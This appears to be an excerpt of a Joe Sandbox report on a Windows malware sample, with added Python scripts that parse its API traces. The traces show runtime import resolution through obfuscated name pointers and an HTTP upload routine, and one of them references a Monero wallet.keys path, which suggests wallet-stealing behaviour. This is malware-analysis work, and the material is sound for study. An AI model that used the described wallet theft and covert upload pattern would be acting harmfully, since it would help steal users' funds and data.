                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: afb44e62d41cd966ef1b42b5d19474a07088dc3658bcc252d26f8a22329d1838
                            • Instruction ID: d59fb4aa7145a2621f4ada274e55edbcb7be5ed8dbb97556dfad6a8ca9882e4d
                            • Opcode Fuzzy Hash: afb44e62d41cd966ef1b42b5d19474a07088dc3658bcc252d26f8a22329d1838
                            • Instruction Fuzzy Hash: E6F04FB1944209EBCB14DF98DD46BAEFBB8EB05711F10062AFA15A3780C77515448BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 5fc7e6bdc56ffb53b47c246a6ec3bc464d50b5591dedd9a1bf2585bb8543322d
                            • Instruction ID: 4a6ed34b51c7fc5f659c71230405764f08f3074541e14776f044e3116437d5bf
                            • Opcode Fuzzy Hash: 5fc7e6bdc56ffb53b47c246a6ec3bc464d50b5591dedd9a1bf2585bb8543322d
                            • Instruction Fuzzy Hash: 73D05E74D0030C9BCB14DFE0D9496DDBB79FB08315F0005A4DD1572380EA305485CB65

                            Control-flow Graph (rendered as an image in the original report; node list summarised)
                            • Blocks e59f20-e5aa19: the entry check at e59f20 leads either to the first group of 43 GetProcAddress calls (e59f30-e5a341) or straight to the 8 LoadLibraryA calls at e5a346-e5a3da; the remaining 61 GetProcAddress calls follow in 12 per-module groups (5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1, 4), each entered from a short conditional block (e.g. e5a456-e5a45d) that can also skip it; all paths converge at e5aa18-e5aa19.
                            APIs
                            • GetProcAddress.KERNEL32(75900000,009B7250), ref: 00E59F3D
                            • GetProcAddress.KERNEL32(75900000,009B73D0), ref: 00E59F55
                            • GetProcAddress.KERNEL32(75900000,009C9E40), ref: 00E59F6E
                            • GetProcAddress.KERNEL32(75900000,009C9DF8), ref: 00E59F86
                            • GetProcAddress.KERNEL32(75900000,009CDE50), ref: 00E59F9E
                            • GetProcAddress.KERNEL32(75900000,009CDE80), ref: 00E59FB7
                            • GetProcAddress.KERNEL32(75900000,009BC420), ref: 00E59FCF
                            • GetProcAddress.KERNEL32(75900000,009CDE20), ref: 00E59FE7
                            • GetProcAddress.KERNEL32(75900000,009CDCD0), ref: 00E5A000
                            • GetProcAddress.KERNEL32(75900000,009CDD18), ref: 00E5A018
                            • GetProcAddress.KERNEL32(75900000,009CDD48), ref: 00E5A030
                            • GetProcAddress.KERNEL32(75900000,009B7470), ref: 00E5A049
                            • GetProcAddress.KERNEL32(75900000,009B7130), ref: 00E5A061
                            • GetProcAddress.KERNEL32(75900000,009B7150), ref: 00E5A079
                            • GetProcAddress.KERNEL32(75900000,009B7290), ref: 00E5A092
                            • GetProcAddress.KERNEL32(75900000,009CDD30), ref: 00E5A0AA
                            • GetProcAddress.KERNEL32(75900000,009CDE38), ref: 00E5A0C2
                            • GetProcAddress.KERNEL32(75900000,009BC240), ref: 00E5A0DB
                            • GetProcAddress.KERNEL32(75900000,009B7190), ref: 00E5A0F3
                            • GetProcAddress.KERNEL32(75900000,009CDCE8), ref: 00E5A10B
                            • GetProcAddress.KERNEL32(75900000,009CDDD8), ref: 00E5A124
                            • GetProcAddress.KERNEL32(75900000,009CDE68), ref: 00E5A13C
                            • GetProcAddress.KERNEL32(75900000,009CDD00), ref: 00E5A154
                            • GetProcAddress.KERNEL32(75900000,009B7370), ref: 00E5A16D
                            • GetProcAddress.KERNEL32(75900000,009CDD60), ref: 00E5A185
                            • GetProcAddress.KERNEL32(75900000,009CDE08), ref: 00E5A19D
                            • GetProcAddress.KERNEL32(75900000,009CDD78), ref: 00E5A1B6
                            • GetProcAddress.KERNEL32(75900000,009CDD90), ref: 00E5A1CE
                            • GetProcAddress.KERNEL32(75900000,009CDDA8), ref: 00E5A1E6
                            • GetProcAddress.KERNEL32(75900000,009CDDC0), ref: 00E5A1FF
                            • GetProcAddress.KERNEL32(75900000,009CDDF0), ref: 00E5A217
                            • GetProcAddress.KERNEL32(75900000,009CD850), ref: 00E5A22F
                            • GetProcAddress.KERNEL32(75900000,009CD970), ref: 00E5A248
                            • GetProcAddress.KERNEL32(75900000,009CB140), ref: 00E5A260
                            • GetProcAddress.KERNEL32(75900000,009CD958), ref: 00E5A278
                            • GetProcAddress.KERNEL32(75900000,009CD700), ref: 00E5A291
                            • GetProcAddress.KERNEL32(75900000,009B71D0), ref: 00E5A2A9
                            • GetProcAddress.KERNEL32(75900000,009CD7F0), ref: 00E5A2C1
                            • GetProcAddress.KERNEL32(75900000,009B7270), ref: 00E5A2DA
                            • GetProcAddress.KERNEL32(75900000,009CD898), ref: 00E5A2F2
                            • GetProcAddress.KERNEL32(75900000,009CD808), ref: 00E5A30A
                            • GetProcAddress.KERNEL32(75900000,009B72D0), ref: 00E5A323
                            • GetProcAddress.KERNEL32(75900000,009B72F0), ref: 00E5A33B
                            • LoadLibraryA.KERNEL32(009CD820,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A34D
                            • LoadLibraryA.KERNEL32(009CD868,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A35E
                            • LoadLibraryA.KERNEL32(009CD8B0,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A370
                            • LoadLibraryA.KERNEL32(009CD7C0,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A382
                            • LoadLibraryA.KERNEL32(009CD838,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A393
                            • LoadLibraryA.KERNEL32(009CD6E8,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3A5
                            • LoadLibraryA.KERNEL32(009CD8C8,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3B7
                            • LoadLibraryA.KERNEL32(009CD760,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3C8
                            • GetProcAddress.KERNEL32(75FD0000,009B7690), ref: 00E5A3EA
                            • GetProcAddress.KERNEL32(75FD0000,009CD880), ref: 00E5A402
                            • GetProcAddress.KERNEL32(75FD0000,009C9768), ref: 00E5A41A
                            • GetProcAddress.KERNEL32(75FD0000,009CD7A8), ref: 00E5A433
                            • GetProcAddress.KERNEL32(75FD0000,009B7730), ref: 00E5A44B
                            • GetProcAddress.KERNEL32(6FD30000,009BC100), ref: 00E5A470
                            • GetProcAddress.KERNEL32(6FD30000,009B7850), ref: 00E5A489
                            • GetProcAddress.KERNEL32(6FD30000,009BC0B0), ref: 00E5A4A1
                            • GetProcAddress.KERNEL32(6FD30000,009CD910), ref: 00E5A4B9
                            • GetProcAddress.KERNEL32(6FD30000,009CD6D0), ref: 00E5A4D2
                            • GetProcAddress.KERNEL32(6FD30000,009B77B0), ref: 00E5A4EA
                            • GetProcAddress.KERNEL32(6FD30000,009B74B0), ref: 00E5A502
                            • GetProcAddress.KERNEL32(6FD30000,009CD8E0), ref: 00E5A51B
                            • GetProcAddress.KERNEL32(763B0000,009B74D0), ref: 00E5A53C
                            • GetProcAddress.KERNEL32(763B0000,009B77F0), ref: 00E5A554
                            • GetProcAddress.KERNEL32(763B0000,009CD8F8), ref: 00E5A56D
                            • GetProcAddress.KERNEL32(763B0000,009CD988), ref: 00E5A585
                            • GetProcAddress.KERNEL32(763B0000,009B77D0), ref: 00E5A59D
                            • GetProcAddress.KERNEL32(750F0000,009BBCF0), ref: 00E5A5C3
                            • GetProcAddress.KERNEL32(750F0000,009BC038), ref: 00E5A5DB
                            • GetProcAddress.KERNEL32(750F0000,009CD928), ref: 00E5A5F3
                            • GetProcAddress.KERNEL32(750F0000,009B7810), ref: 00E5A60C
                            • GetProcAddress.KERNEL32(750F0000,009B7630), ref: 00E5A624
                            • GetProcAddress.KERNEL32(750F0000,009BBF48), ref: 00E5A63C
                            • GetProcAddress.KERNEL32(75A50000,009CD940), ref: 00E5A662
                            • GetProcAddress.KERNEL32(75A50000,009B7550), ref: 00E5A67A
                            • GetProcAddress.KERNEL32(75A50000,009C9778), ref: 00E5A692
                            • GetProcAddress.KERNEL32(75A50000,009CD9A0), ref: 00E5A6AB
                            • GetProcAddress.KERNEL32(75A50000,009CD718), ref: 00E5A6C3
                            • GetProcAddress.KERNEL32(75A50000,009B7830), ref: 00E5A6DB
                            • GetProcAddress.KERNEL32(75A50000,009B75B0), ref: 00E5A6F4
                            • GetProcAddress.KERNEL32(75A50000,009CD9B8), ref: 00E5A70C
                            • GetProcAddress.KERNEL32(75A50000,009CD730), ref: 00E5A724
                            • GetProcAddress.KERNEL32(75070000,009B74F0), ref: 00E5A746
                            • GetProcAddress.KERNEL32(75070000,009CD790), ref: 00E5A75E
                            • GetProcAddress.KERNEL32(75070000,009CD748), ref: 00E5A776
                            • GetProcAddress.KERNEL32(75070000,009CD778), ref: 00E5A78F
                            • GetProcAddress.KERNEL32(75070000,009CD7D8), ref: 00E5A7A7
                            • GetProcAddress.KERNEL32(74E50000,009B7510), ref: 00E5A7C8
                            • GetProcAddress.KERNEL32(74E50000,009B7650), ref: 00E5A7E1
                            • GetProcAddress.KERNEL32(75320000,009B7530), ref: 00E5A802
                            • GetProcAddress.KERNEL32(75320000,009CDCA0), ref: 00E5A81A
                            • GetProcAddress.KERNEL32(6F060000,009B7710), ref: 00E5A840
                            • GetProcAddress.KERNEL32(6F060000,009B76B0), ref: 00E5A858
                            • GetProcAddress.KERNEL32(6F060000,009B7570), ref: 00E5A870
                            • GetProcAddress.KERNEL32(6F060000,009CDBE0), ref: 00E5A889
                            • GetProcAddress.KERNEL32(6F060000,009B7590), ref: 00E5A8A1
                            • GetProcAddress.KERNEL32(6F060000,009B75D0), ref: 00E5A8B9
                            • GetProcAddress.KERNEL32(6F060000,009B7670), ref: 00E5A8D2
                            • GetProcAddress.KERNEL32(6F060000,009B76D0), ref: 00E5A8EA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E5A901
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E5A917
                            • GetProcAddress.KERNEL32(74E00000,009CDA30), ref: 00E5A939
                            • GetProcAddress.KERNEL32(74E00000,009C9828), ref: 00E5A951
                            • GetProcAddress.KERNEL32(74E00000,009CDA90), ref: 00E5A969
                            • GetProcAddress.KERNEL32(74E00000,009CDB98), ref: 00E5A982
                            • GetProcAddress.KERNEL32(74DF0000,009B76F0), ref: 00E5A9A3
                            • GetProcAddress.KERNEL32(6E330000,009CDC28), ref: 00E5A9C4
                            • GetProcAddress.KERNEL32(6E330000,009B7750), ref: 00E5A9DD
                            • GetProcAddress.KERNEL32(6E330000,009CDBF8), ref: 00E5A9F5
                            • GetProcAddress.KERNEL32(6E330000,009CDC10), ref: 00E5AA0D
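The 104 GetProcAddress calls listed above pass a module handle as the first argument and, in all but two cases (InternetSetOptionA and HttpQueryInfoA against handle 6F060000), a pointer in the 0x009B7xxx-0x009CDxxx range rather than a readable function name; that range lies outside the 0xE40000 image, which is consistent with the names being produced at runtime, although the trace itself does not say how. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses trace lines in the format shown above (the embedded TRACE is a constructed excerpt of the page's own lines) and groups the resolved imports by module handle, separating literal names from pointer arguments so the analyst can see how many imports each module contributes and where the name strings live.

```python
import re
from collections import defaultdict

# Constructed excerpt of the Joe Sandbox "APIs" lines for the import-resolution
# function at 0xE59F20 (a handful of the 104 calls; the report lists them all).
TRACE = """\
GetProcAddress.KERNEL32(75900000,009B7250), ref: 00E59F3D
GetProcAddress.KERNEL32(75900000,009B73D0), ref: 00E59F55
LoadLibraryA.KERNEL32(009CD820,?,00E55EF3,00E60AEB), ref: 00E5A34D
GetProcAddress.KERNEL32(75FD0000,009B7690), ref: 00E5A3EA
GetProcAddress.KERNEL32(6F060000,009B7710), ref: 00E5A840
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E5A901
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E5A917
GetProcAddress.KERNEL32(6E330000,009CDC28), ref: 00E5A9C4
"""

# One trace line: "<Api>.<Module>(<args>), ref: <call-site address>"
CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})$")
HEX32 = re.compile(r"^[0-9A-F]{8}$")


def parse_calls(text):
    """Yield (api, [args], ref) for every line that matches the trace format."""
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if m:
            yield m["api"], m["args"].split(","), int(m["ref"], 16)


def resolve_summary(text):
    """Group GetProcAddress calls by module handle.

    Returns {handle: {"count": n, "literal": [names], "pointer": [addresses]}}.
    An 8-digit hex second argument is an address the sandbox did not render as a
    string (the name was not readable in the image at trace time); only names that
    appear verbatim are counted as literal.
    """
    out = defaultdict(lambda: {"count": 0, "literal": [], "pointer": []})
    for api, args, _ in parse_calls(text):
        if api != "GetProcAddress" or len(args) < 2:
            continue
        handle, name = args[0], args[1]
        rec = out[handle]
        rec["count"] += 1
        (rec["pointer"] if HEX32.match(name) else rec["literal"]).append(name)
    return dict(out)


def string_pool_range(text):
    """Lowest and highest pointer-typed name argument: the region holding the name strings."""
    ptrs = [int(p, 16) for rec in resolve_summary(text).values() for p in rec["pointer"]]
    return (min(ptrs), max(ptrs)) if ptrs else None


def loadlibrary_count(text):
    """Number of LoadLibraryA calls in the trace (modules loaded before resolution)."""
    return sum(1 for api, _, _ in parse_calls(text) if api == "LoadLibraryA")


if __name__ == "__main__":
    for handle, rec in sorted(resolve_summary(TRACE).items()):
        print(f"{handle}: {rec['count']} imports, literal names={rec['literal']}")
    lo, hi = string_pool_range(TRACE)
    print(f"name strings at {lo:#010x}-{hi:#010x}; LoadLibraryA calls: {loadlibrary_count(TRACE)}")
```

Run over the full list from the report, the per-handle counts reproduce the 43/5/8/5/6/9/5/2/2/10/4/1/4 grouping of the control-flow graph, and the literal list stays at the two WinINet names; the module handles are the values from this run of the sandbox and will differ on another machine.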
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 290950d775ae3b4bbbb4377473969f09b70f1963996115c34259906cefe7bcae
                            • Instruction ID: 2487cec15579579fe7c0485bb482de47c4378b0902f32a18f8dad45d586a1e56
                            • Opcode Fuzzy Hash: 290950d775ae3b4bbbb4377473969f09b70f1963996115c34259906cefe7bcae
                            • Instruction Fuzzy Hash: CC6230B55412109FC36DDFA8EB88956F7BAB74D3013108A3AF929C3398DB7595C1CB60

                            Control-flow Graph (rendered as an image in the original report; node list summarised)
                            • Blocks e448d0-e44ff2: InternetOpenA and StrCmpCA at entry (e448d0-e44992); InternetConnectA at e449a5-e44b1d; HttpOpenRequestA at e44b3f-e44b72; a long run of string-building subcalls (e5ac30, e5abb0, e5ab10, e5acc0) and two lstrlen calls before HttpSendRequestA at e44b78-e44e78; InternetReadFile loop at e44e82-e44eac, with e44eb9-e44ef7 appending each chunk and looping back; the failure edges of the entry check, InternetConnectA and HttpOpenRequestA and the read-loop exit all reach the InternetCloseHandle blocks at e44f0e and e44f1b, followed by cleanup at e44f45-e44ff2.
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44965
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E4498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E44B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E60DDE,00000000,?,?,00000000,?,",00000000,?,009CF330), ref: 00E44E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E44E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E44E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E44E99
                            • InternetCloseHandle.WININET(00000000), ref: 00E44EFD
                            • InternetCloseHandle.WININET(00000000), ref: 00E44F15
                            • HttpOpenRequestA.WININET(00000000,009CF2F0,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E44B65
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00E44F1F
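The trace above lists the WinINet calls grouped by API rather than in call order, and leaves the numeric arguments undecoded: InternetOpenA's access type 1, InternetConnectA's service 3, HttpOpenRequestA's flags 0x00400100, and a 0x7CF-byte InternetReadFile buffer. The Python below is an added example, not from the report or the sample: it restores call-site order from the ref addresses (for this straight-line function that matches the control-flow graph; in general the ref is the call site, not a timestamp), decodes those constants with their wininet.h names, and checks that the chain follows the Open, Connect, OpenRequest, SendRequest, ReadFile order an HTTP client must use. The embedded TRACE is a constructed excerpt of the lines above. The quote and "------" fragments in this function's String ID are consistent with a multipart/form-data body, but the body is not in the trace and is not reconstructed here.

```python
import re

# Constructed excerpt of the "APIs" lines of the HTTP function at 0xE448D0, copied
# in the order the report lists them (grouped by API, not by execution).
TRACE = """\
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44965
StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E4498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E44B0A
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E44E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E44E99
InternetCloseHandle.WININET(00000000), ref: 00E44EFD
InternetCloseHandle.WININET(00000000), ref: 00E44F15
HttpOpenRequestA.WININET(00000000,009CF2F0,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E44B65
InternetCloseHandle.WININET(00000000), ref: 00E44F1F
"""

CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})$")

# WinINet constants (wininet.h) needed to read the arguments above.
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


def parse_calls(text):
    """Parse the trace and return calls sorted by call-site address (the 'ref')."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if m:
            calls.append((m["api"], m["args"].split(","), int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c[2])


def decode_flags(value):
    """Split a dwFlags value into known INTERNET_FLAG_* names plus any unknown remainder."""
    names = [name for bit, name in REQUEST_FLAGS.items() if value & bit]
    leftover = value & ~sum(REQUEST_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def session_summary(text):
    """Describe the WinINet session the function sets up: chain, access type, service, flags, read size."""
    s = {"chain": [], "reads": 0}
    for api, args, _ in parse_calls(text):
        if api.startswith(("Internet", "Http")):
            s["chain"].append(api)
        if api == "InternetOpenA":                     # (agent, dwAccessType, proxy, bypass, flags)
            s["access"] = OPEN_TYPE.get(int(args[1], 16), args[1])
        elif api == "InternetConnectA":                # (hInternet, server, port, user, pass, dwService, flags, ctx)
            s["service"] = SERVICE.get(int(args[5], 16), args[5])
        elif api == "HttpOpenRequestA":                # (hConnect, verb, object, version, referrer, accept, dwFlags, ctx)
            s["flags"] = decode_flags(int(args[6], 16))  # verb/object are unresolved pointers in the trace
        elif api == "InternetReadFile":                # (hFile, buffer, dwNumberOfBytesToRead, lpdwRead)
            s["chunk"] = int(args[2], 16)
            s["reads"] += 1
    return s


def chain_is_canonical(chain):
    """True when the five mandatory calls are all present and in the order WinINet requires."""
    order = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"]
    pos = [chain.index(a) for a in order if a in chain]
    return len(pos) == len(order) and pos == sorted(pos)


if __name__ == "__main__":
    summary = session_summary(TRACE)
    print(" -> ".join(summary["chain"]))
    print(summary["access"], summary["service"], summary["flags"], f"read chunk={summary['chunk']} bytes")
    print("canonical order:", chain_is_canonical(summary["chain"]))
```

The decoded session is a direct (no proxy) plain-HTTP connection whose request asks for a keep-alive connection and a Pragma: no-cache header, with the response read in 1999-byte chunks; the three InternetCloseHandle calls at the end correspond to the request, connection and session handles on the graph's exit paths.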
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 63892b7816de601d8bf02586df4e20e31643fe0071d5c3da5b094a7d12abb775
